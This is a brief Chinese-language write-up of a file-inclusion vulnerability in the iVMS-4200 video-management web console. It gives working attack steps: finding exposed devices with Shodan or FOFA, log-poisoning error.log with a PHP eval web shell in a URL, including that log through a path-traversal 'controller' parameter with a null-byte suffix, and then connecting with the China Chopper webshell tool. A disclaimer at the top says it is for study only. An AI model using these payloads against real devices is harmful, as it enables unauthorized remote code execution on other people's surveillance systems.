聲明
本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者無關。
一、漏洞介紹
iVMS-4200適用於嵌入式網絡硬盤錄像機、混合型網絡硬盤錄像機、網絡視頻服務器、NVR、IP Camera和解碼設備以及視音頻編解碼卡,支持實時預覽、遠程回放和下載、資源管理、遠程配置、用戶管理、系統配置等多種功能。
簡單來說,它包含了一個WEB版的控制台,用到了一個比較小眾的框架
,然后被這個Xphp的框架賣了。
漏洞出現在
controller參數的一個任意文件包含。
二、查找設備
利用shodan、FOFA等查找iVMS-4200的設備
三、漏洞復現
1、首先構造URL訪問,使其記錄在error.log中
http://xxx.xxx.xxx.xxx:xx/<?eval($_POST['pass'])?>
2、 直接包含這個客戶端自帶的Nginx日志文件
http://xxx.xxx.xxx.xxx:xx/index.php?controller=../../../../Server/logs/error.log%00.php
(此處不截圖,自行測試查看)
3、中國菜刀連接